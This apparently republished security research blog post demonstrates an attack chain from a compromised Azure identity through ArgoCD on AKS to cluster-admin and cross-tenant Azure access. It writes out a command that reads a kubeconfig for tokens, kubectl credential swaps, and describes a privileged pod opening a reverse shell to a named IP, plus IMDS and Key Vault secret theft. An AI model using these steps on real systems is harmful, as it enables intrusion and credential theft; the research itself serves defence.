Quantcast
Viewing all articles
Browse latest Browse all 95

From ArgoCD To Azure Hybrid Attacks

In the ever-changing DevOps and cloud-native applications landscape, continuous delivery tools have become essential for managing deployments at scale. Among these tools, Argo CD has become a popular choice for Kubernetes-native continuous delivery. But as we all know, with great power comes great responsibility, and the security implications of such powerful tools cannot be overlooked.

While ArgoCD streamlines the deployment process and ensures consistency across environments, its default configuration and privileged access patterns can potentially create security vulnerabilities that malicious actors might exploit. This blog post looks at the critical security considerations surrounding ArgoCD deployments, particularly focusing on privilege escalation risks and potential attack vectors in Azure Kubernetes Service (AKS) environments.

Through practical demonstrations and real-world scenarios, we’ll explore how seemingly innocent misconfigurations or compromised credentials can lead to serious security breaches, allowing attackers to gain unauthorized cluster access, manipulate deployments, and potentially access sensitive cloud resources. Understanding these security implications is crucial for organizations implementing ArgoCD in their production environments.

What is ArgoCD?

ArgoCD is a declarative continuous delivery tool for Kubernetes. It can be used as a controller that continuously monitors running applications and compares their current states against their desired target states to deliver needed resources to your clusters.

Excessive Permissions?

By default, when deploying an ArgoCD to a Kubernetes cluster, some containers will be deployed with a privileged service account attached and cluster-level permissions. If compromised, an attacker can gain complete control over the cluster, access cloud identity credentials, and move laterally to different environments.

What Are We Going to Demonstrate?

The attacks we are going to present are based on the assumption of a compromised cloud identity (in our case, a compromised user account) and its permissions related to the RBAC (Role-Based Access Control) of the Azure Resource Manager (ARM), the RBAC of the Kubernetes Local accounts on AKS (Azure Kubernetes Service) and how we can access the admin interface of “Argocd” and escalate our privileges within the Kubernetes cluster with a different approach from these available online today.

The flow of the attack in a specific Azure environment:

  • Execute command on a VM using Azure RBAC permissions.
  • Stealing Kubernetes Service Account token (from <USER HOME PATH>\.kube\config ) from the workstation.
  • Kubernetes — Enabled AKS local accounts RBAC configuration.
  • Modify Argo CD Kubernetes secrets via Kubernetes RBAC permissions.
  • A Kubernetes identity that has permission to ‘patch’/’update’ a specific Argo CD secret.
  • Using Argo CD secret to deploy a privileged pod for container escape scenario to the hosting Node.
  • Accessing Cloud IAM credentials from the hosting Node.

First demo settings:

Azure Cloud Service: Azure Kubernetes Service (AKS)

Kubernetes version: 1.28.9

Kubernetes cluster accessibility (private/public): Public cluster

Kubernetes Authentication and Authorization method: Local account with Kubernetes RBAC

Argocd application — Accessible via a Kubernetes Service of type “LoadBalancer” in the Kubernetes cluster (this is not a pre-condition for the attack).

Argocd default admin: enabled.

Argocd built-in login access: enabled.

Node OS image — AKSUbuntu-2204gen2containerd-202407.29.0

Steps of Exploitation:

Step 1: Azure Resource Manager — Run Command on VM

Assuming the attacker successfully obtained valid Microsoft Entra ID (formerly Azure AD) credentials:

  • Application credentials (secret, certificate, ADFS).
  • Managed identities — system assigned, user assigned.
  • User credentials.

Now, the attacker can use Azure Resource Manager(ARM) permissions (“Microsoft.Compute/virtualMachines/runCommand/action”) to access resources on the attacked organization’s subscription.

The user account is allowed to run OS commands on the following Virtual Machine:

Image may be NSFW.
Clik here to view.

Step 2: Steal the Kubernetes Authentication Credentials from the VM’s .kube/config file

az vm run-command invoke -g <resource group>-n <name of the machine> — command-id RunShellScript — scripts “cat /home/<username>/.kube/config | grep token:”

Image may be NSFW.
Clik here to view.

The os command is executed to get the service account token to authenticate.

Step 3: Use the Service Account Token via Environment Variable to Authenticate to the Kubernetes Cluster

az vm run-command invoke -g <resource group>-n <name of the machine> — command-id RunShellScript — scripts “export KUBECONFIG=/home/<username>/.kube/config && kubectl get pods -n argocd

Image may be NSFW.
Clik here to view.

The output for listing pods in the argocd namespace using the az vm run command.

Step 4: Enumerate and List Current Roles and Access to our Service Account

Kubernetes RBAC explanation:

ClusterRoles and Roles are Kubernetes entities representing RBAC rule bundles to be applied to Kubernetes identities (subject) upon a scope in the cluster. ClusterRoles can be bound to a specific namespace (RoleBinding) or the entire cluster scope (ClusterRoleBinding), and Roles can be bound to a namespace scope only (RoleBinding).

Roles and ClusterRoles are composed of an array of rules, each having the following properties:

  • API groups — an array that has the API group the relevant resources are part of.
  • Resources — an array that contains the resource types the rules should be applied upon.
  • ResourceNames (optional) — an array that contains resource names to narrow down the resources to be affected by the RBAC rule.
  • Verbs — an array of allowed types of access to have on the resource/s, e.g. “get”, “delete”, “create”, “update” and more.

In summary, ClusterRoles are used for cluster-wide access control and permissions, while Roles are used for defining permissions at the namespace level.

So, now that we better understand how Kubernetes RBAC works, let’s enumerate the “argohelper” Kubernetes service account (which we compromised in stages no.2–3) and its permissions within the cluster.

Image may be NSFW.
Clik here to view.

 Listing Kubernetes namespaces — “argocd” namespace

Image may be NSFW.
Clik here to view.

Listing all the service accounts from the “argocd” namespace.

Image may be NSFW.
Clik here to view.

 Listing roleBindings Kubernetes resources in the “argocd” namespace; As can be seen, the “argohelper” Kubernetes service account is a subject in the roleBinding — “patch-secret-binding”, for the “patch-secret-role” Kubernetes Role.

Image may be NSFW.
Clik here to view.

The “patch-secret-role” Role at the namespace “argocd”, enables to “list” and “patch” the secret “argocd-secret” at the same namespace.

Image may be NSFW.
Clik here to view.

The ClusterRole bindings of the cluster with focus on “argohelper-bind” which binds the Kubernetes service account “argohelper” with the “pod-listing-role” ClusterRole.

Image may be NSFW.
Clik here to view.

The “pod-listing-role” ClusterRole, which enables to “list” and “get” Kubernetes pods at cluster scope.

To summarize, the permissions of the service account “argohelper” enable the following:

  • Permission to “patch” and “update” the “argocd-secret” Kubernetes secret in the “argocd” namespace.
  • Permission to “get” and “list” all pods in the cluster scope.

Step 5: Enumerate the Current Argocd Containers and Their Service Accounts

In the Argo CD documentation, when you want to rotate the admin password, you can take either of the two actions:

  • List Argo CD’s initial admin password from “argocd-initial-admin-secret” Kubernetes secret of “argocd” namespace. If it hasn’t changed already, you can log in to the admin panel using that decoded password.

Kubernetes secret values are base64 encoded after creation.

  • Suppose the first secret doesn’t work since it has already changed, in case you can modify (either by using “patch” or “update” verbs) the “argocd-secret” Kubernetes secret of “argocd” namespace, you can reset the admin password to an arbitrary password; The password value is hashed using bcrypt hashing algorithm, so having permissions to discover it (e.g. via “list” or “get” verbs) is insufficient for being able to determine the admin password.

Image may be NSFW.
Clik here to view.

Listing Kubernetes secrets in the “argocd” namespace.

Image may be NSFW.
Clik here to view.

Getting the current base64 encoded value of “argocd-initial-admin-password” Kubernetes secret in “argocd” namespace.

Image may be NSFW.
Clik here to view.

Getting the current bcrypt hash “argocd-secret” Kubernetes secret values in “argocd” namespace

Image may be NSFW.
Clik here to view.

Kubernetes service accounts in the “argocd” namespace

Image may be NSFW.
Clik here to view.

Let’s list and observe the RoleBindings that are relevant to the above-mentioned Kubernetes service accounts.

I’d like to focus your attention specifically on the following Kubernetes Roles, at the “argocd” namespace:

  • “argocd-application-controller”
  • “argocd-applicationset-controller”

When looking at the two Role definitions, we can see that “argocd-application-controller” has the same permissions as the built-in ClusterRole — “cluster-admin”, the two Roles of the two Kubernetes service accounts running when deploying Argo CD.

Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

Enumerating the pods on the argocd namespace

Image may be NSFW.
Clik here to view.

Getting the pod “argocd-application-controller-0” from namespace “argocd”, including its “metadata.uid”

Step 6: Patch the “argocd-secret” Secret to Get into the Admin Panel

Since the Kubernetes service account we control — “argohelper”, has the permission to “patch” the “argocd-secret” in the “argocd” namespace, we can patch it to an encrypted and encoded password value of our choice:

Image may be NSFW.
Clik here to view.

Patching the Kubernetes secret to the base64 encoded, bcrypt hashed value of the password — “password123”

We still need to determine the Argo CD configurations, for example:

  • Admin user enabled: true/false
  • Default authentication or SSO authentication.

The above configurations are set in the “argocd-cm” Kubernetes configMap, in the ArgoCD namespace:

Image may be NSFW.
Clik here to view.

Getting the “argocd-cm” Kubernetes configMap from “argocd” namespace. The fact that there is no “data” property in the file indicates that this is a default installation of Argo CD.

By default the admin user is enabled and is not represented in the “argocd-cm” Configmap file, to determine whether the admin is disabled, you need to look for the following property in the “argcd-cm” Configmap file:

  • “admin.enabled” with value — “false”

In addition, “argocd-cm” configMap file can define the following settings for ArgoCD:

  • Enable/disable the user account
  • Argocd RBAC based on roles
  • Type of authentication — Built-in or SSO
  • Creation of API keys / Created API keys data/ Creation settings of API keys

Image may be NSFW.
Clik here to view.

Accessing the Argo CD admin panel via the Kubernetes service of type LoadBalancer that made it accessible

Step 7: Creating a Privileged Pod Using an “Argo CD Application”

First, the attacker logs in to the ArgoCD admin panel (steps 5+ 6) goes to the “Applications” page, then clicks on the “+ NEW APP” button:

Image may be NSFW.
Clik here to view.

Set the Argo CD Application resource with the source of a remote CI/CD repository (e.g. GitHub) in your control. It should contain a reference to a Deployment that will create instances of a privileged pod.

Image may be NSFW.
Clik here to view.

Definition of the above-mentioned Argo CD Application, containing a “spec.source.repoURL” directive with URL to a CI/CD repository in your control.

Image may be NSFW.
Clik here to view.

 The YAML definition of the malicious privileged pod we control from our GitHub repository (in our example)

Once our privileged pod has been run, it performs the following:

  • An Ubuntu OS container will run a bash command that executes a reverse shell command to another instance in our control that is listening on TCP port: 7777, in our case, the IP address belongs to a Virtual Machine that has a public IPv4 address — “4.242.16.43”.

Image may be NSFW.
Clik here to view.

In Kubernetes, the Pod’s security context configuration settings -”hostNetwork”, “hostPID”, and “hostIPC”, can have either “true” or “false” values, and relate to process namespace sharing, they are well explained and elaborated in the following article: “Bad Pods: Kubernetes Pod Privilege Escalation” by BishopFox.

While the Argo CD Application is being built and deployed, the pod is being scheduled and run as well. Then it sends a TCP reverse shell connection to our user-controlled machine (a Virtual Machine in our case), on our listening TCP netcat service:

Image may be NSFW.
Clik here to view.

 Receiving the reverse shell connection from the Kubernetes VMSS instance that acts as the Kubernetes Node, to our controlled machine’s listening netcat service on port 7777

Image may be NSFW.
Clik here to view.

“Chrooting” the “/host” path which is a mounted hostPath Kubernetes Volume with the path to the host’s root file system. The “chroot /host” command in this case will enable you to elevate to the host’s root process namespace.

From this point, you can directly access the privileged Kubernetes service account — “argocd-application-controller” at namespace “argocd”

Image may be NSFW.
Clik here to view.

Using our reverse shell to the host’s file system to list pods and their containers, whilst focusing on “argocd-application-controller” pod container and enumerating its UID

From this point, we can compromise associated resources of the pods that are scheduled on the same Node. For example, it’s possible to access the mounted projected volumes of the pod that contains the attached Kubernetes service account token in our case.

Image may be NSFW.
Clik here to view.

Exposing the pod’s mounted service account token from the host’s file system

Image may be NSFW.
Clik here to view.

To demonstrate that the JWT (Json Web Token) that we obtained is for the “argocd-application-Controller” service account

After setting the service account token as our client credential, the “kubectl auth can-i — list” command outputs our compromised service account’s permissions within the cluster scope, privileges that are equivalent to the “cluster-admin” ClusterRole.

Authenticating with a token of the service account “argocd-application-controller”:

Image may be NSFW.
Clik here to view.

Resetting the client credentials to use a service account token –

kubectl config set-credentials argocd-application-controller — token=<k8s service account token>

Image may be NSFW.
Clik here to view.

Using the following kubectl command to reset the service account user credential in our current context:

kubectl config set-context — current — user=argocd-application-controller

In addition to compromising the pod’s attached Kubernetes resources, there is another vector we can leverage in cloud environments: steal the Node’s Azure Managed Identity via IMDS (Instance Meta-Data Settings), to move laterally and possibly gain some more privileges within the Azure environment.

But what happens if you can’t create a privileged pod due to an admission control policy in place to prevent you from deploying an “escapeable” Pod?

The fact is that you don’t have to break out of the container to access the cloud provider’s IMDS, using the `hostNetwork` pod security context setting set as `true`, using this setting, you essentially share the network interface of the node and can access the IMDS even without the need to escape your newly deployed pod:

Image may be NSFW.
Clik here to view.

Reverse shell with the unprivileged pod.

Image may be NSFW.
Clik here to view.

Root on the container level (not the node level).

Image may be NSFW.
Clik here to view.

 The token of the managed identity that permissions on the Azure resource Management (ARM) rest API.

Azure Kubernetes Workload Identity:

Kubernetes workloads deployed on Azure Kubernetes Services (AKS) clusters sometimes require having Microsoft Entra Identities with adequate permissions to access Microsoft Entra-protected resources, such as Azure Key Vault (Azure Resource Manager), etc.

There are multiple authentication and authorization options available on AKS clusters that enable “hybrid” identity permissions across environments, meaning that it essentially allows Kubernetes Service Accounts to assume Azure Principals and their derivative permissions. The newest and most recommended feature in this genre that supports AKS is Microsoft Entra Workload ID for AKS, which is supported in AKS clusters since version 1.22. It utilizes the cluster’s defined Open ID Connect (OIDC) server that will authorize and authenticate Kubernetes Service Accounts to Microsoft Entra ID resources, rather than having a static authentication credential that is saved as a Kubernetes Secret. In this scenario, we’ll demonstrate access to Azure Key Vault secrets resources.

The following steps are required to enable the Workload Identity feature for an AKS cluster:

  1. Enable Entra Workload ID for the AKS cluster, either by updating its “securityProfile”, or by recreating it, e.g. updating an existing AKS cluster:
  • Enable Entra Workload ID for an existing cluster:
    az aks update -g <RESOURCE GROUP> -n <CLUSTER> — enable-oidc-issuer — enable-workload-identity
  • Determine OIDC server’s URL:
    az aks show -g <RESOURCE GROUP> -n <CLUSTER> — query “oidcIssuerProfile.issuerUrl”
  • Determine whether Entra Workload ID is enabled:
    az aks show -g <RESOURCE GROUP> -n <CLUSTER> — query “securityProfile.workloadIdentity.enabled” — will be ‘true’ in case enabled
  1. Create or use existing User-Assigned Managed Identity or Entra ID Application, that will have the federated credentials defined:
  • E.g., create a new User-Assigned Managed Identity –
    az identity create -n <IDENTITY> -g <RESOURCE GROUP> -l <LOCATION>
  • E.g., create an Application — az ad sp create — id
  1. Create a Federation credential for the dedicated User-Assigned Managed Identity / Entra ID Application, that uses the cluster’s defined “oidcIssuerProfile.issuerUrl” OIDC server, and match a dedicated Kubernetes Service Account at a specific Kubernetes namespace (created at stage 4), have an Audience “api://AzureADTokenExchange”; This can be done via the CLI using the command:
  • For Azure User-Assigned Managed Identity –

az identity federated-credential create — name <NAME> — identity-name <MANAGED IDENTITY NAME> — resource-group <RESOURCE GROUP> — issuer <OIDC SERVER> — subject system:serviceaccount:”<NAMESPACE>”:”<SA NAME>” — audience <AUDIENCE>

  • For Azure Application –

az ad app federated-credential create — name <NAME> — id <APPLICATION ID> — resource-group <RESOURCE GROUP> — issuer <OIDC SERVER> — subject system:serviceaccount:”<NAMESPACE>”:”<SA NAME>” — audience <AUDIENCE>

  1. Create a Kubernetes Service Account that is assigned for the Federation credential of the Azure Principal, annotate it with the following:
  • azure.workload.identity/client-id: <TARGET AZURE PRINCIPAL CLIENT ID>
  • azure.workload.identity/tenant-id: <TARGET AZURE TENANT ID> //(Optional)

The following Kubernetes Service Accounts and Pods annotations can help you to configure and harden the Microsoft Entra ID feature’s overall security in your cluster:

<need to put the chart here>

Azure AD Workload Identity

The following is a list of available labels and annotations that can be used to configure the behavior when exchanging…

azure.github.io

In an adequately configured AKS environment, the Kubernetes service account token will be automatically mounted to any Pod that utilizes that same service account using the Kubernetes service account’s annotations and validating authentication requests, then the credential “conversion” process is as elaborated in the diagram below:

Image may be NSFW.
Clik here to view.

Microsoft Entra Workload ID supports the following mappings related to a Kubernetes service account:

  • “One-to-one”, where a service account references a Microsoft Entra object.
  • “Many-to-one”, where multiple service accounts reference the same Microsoft Entra object.
  • “One-to-many”, where a service account references multiple Microsoft Entra objects by changing the Client ID annotation.

Attack Scenarios

Cross-tenants lateral movement

In either mapping case, it’s possible to set the mapped identity to one that resides in a different Azure tenant than the cluster itself, using the elaborated above annotation — azure.workload.identity/tenant-id, set with the tenant UUID whereas the mapped Azure Principal exists.

For example:

The Azure user “ilz@xmresearchtest.onmicrosoft.com” is currently authenticated and has permissions to our AKS cluster “xmcyber-optimized” at tenant “XM Cyber Research.” It’s bound with the “cluster-admin” Kubernetes ClusterRole and can execute commands on the Pod “default” at the “default” namespace, which has the Azure Workload Identity credentials mounted upon it.

Image may be NSFW.
Clik here to view.

On the remote tenant (“ModelSubscription”), we created a Service Principal named “melech-external”, we added a Federated credential (“external-federated-aks”) that is set with “XM Cyber Research” tenants’ OIDC server URL that’s defined on our “xmcyber-optimized” AKS cluster, along with Kubernetes service account “default” at namespace “default”.

Image may be NSFW.
Clik here to view.

Using the mounted Federated credentials on our Pod, we are now authenticated to the “ModelSubscription” Azure tenant as the Service Principal “melech-external”, it is set with the “Azure Kubernetes Service Cluster User Role” and “Azure Kubernetes Service RBAC Reader” Azure Resource Manager RBAC Roles that enables it to access most of the remote tenants’ AKS resources at the permitted scope, including the “aks_cluster_scenario_tester” AKS cluster.

Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

Our Service Principal “melech-external” and the Azure RBAC Roles it’s assigned to.

Image may be NSFW.
Clik here to view.

Our Service Principal “melech-external” and the Azure RBAC Roles it’s assigned to.

Image may be NSFW.
Clik here to view.

Retrieving the adequate kubeconfig settings using the Az SDK, converting the authentication credential format to match this specific scenario using Azure Workload Identity, and at last — listing resources that reside at the remote cluster — “aks_cluster_scenario_tester” AKS cluster

This feature may enable an attacker to compromise multiple Azure principals with permissions over multiple Azure tenants.

“One-to-Many” for Lateral Movement

As a result of how this feature operates, as long as there are multiple Federation Credential mappings for Azure Service Principals / User-Assigned Managed Identities, and in case an attacker can either modify Kubernetes service accounts annotation to different Azure Service Principal Client IDs, or create a new Kubernetes service account with the adequate annotations — the attacker can change the mapped Azure Principal to another, to move laterally and assume other Azure principals that are having more/different permissions.


Alternatively, in case the attacker also has the required permissions to modify a Kubernetes service account are either “update” or “patch” verbs over “serviceaccounts” resources, at “core” API (default in case empty); In addition, for Microsoft Entra ID authentication with Azure RBAC in AKS, an Azure principal that has the “Microsoft.ContainerService/managedClusters/serviceaccounts/write” ‘dataAction’ assigned to it for the relevant AKS cluster/s scopes.

Also, to compromise Microsoft Entra ID principals who don’t have pre-existing federation credential mappings — the following attack vectors are possible:

  • If the attackers also have the Azure Resource Manager’s RBAC permission—“Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write” over Azure User-Assigned Managed Identities—they can compromise them while mapping them to a Kubernetes service account it controls.
  • In case the attackers also have the Microsoft Entra Directory RBAC permission — “microsoft.directory/applications/credentials/update” over an Azure Application — they can compromise its app registrations, while mapping them to a Kubernetes service account it controls.

An attacker with one of the permissions mentioned above can compromise the Azure principals in the permission’s scope.

When the abovementioned scenario is possible an attacker can use the ‘azure.workload.identity’ various annotations while setting the desired Azure service principal and matching tenant UUIDs, for example:

The following scenario continues the previous multi-tenant scenario in which the mapped Azure Principal has Azure Resource Manager permissions over AKS clusters; In this scenario, there’s another Microsoft Entra ID Application with other Azure Resource Managers’ RBAC permissions:

Image may be NSFW.
Clik here to view.

Entra ID Application “Caesar-dev” is assigned to the Azure Resource Manager Role “Key Vault Secrets User” that enables it to read Azure Key Vault Secrets data

Image may be NSFW.
Clik here to view.

Entra ID Application “Caesar-dev” is assigned to the Microsoft Ultra ID Role “Application Administrator” which among other things enables it to create Applications Federated Credentials

Image may be NSFW.
Clik here to view.

Using melech-external’s “Application Administrator” Application Role we could add The Entra ID Application “Caesar-dev” with new Federated credentials assigned to the “poc” Kubernetes service account at namespace “default”, for the previous AKS cluster — “xmcyber-optimized”

Image may be NSFW.
Clik here to view.

 On the AKS cluster — “xmcyber-optimized”, we can now create a Kubernetes service account “poc” at namespace “default” that assumes the remote “Caesar-dev” app registration Federated Credential

Image may be NSFW.
Clik here to view.

On the AKS cluster — “xmcyber-optimized”, we can now create a Kubernetes pod “poc-pod” at namespace “default” that utilizes the “poc” Kubernetes service account that assumes the remote “Caesar-dev” app registration Federated Credential, using the assumed remote App registration we could leverage “Caesar-dev” “Key Vault Secret User” assigned Azure Resource Manager Role to read secrets of the “dev-top-secret” Azure Key Vault, in this example we had attained the “top-secret” Secret.

To sum up, attackers who have compromised an AKS Pod in an AKS cluster that supports Microsoft Entra ID for AKS may be able to abuse this feature and move laterally and/or vertically to Azure environments and principals they contain, given other permissions they may attain during their attack orchestration.

 

The post From ArgoCD To Azure Hybrid Attacks appeared first on XM Cyber.


Viewing all articles
Browse latest Browse all 95

Trending Articles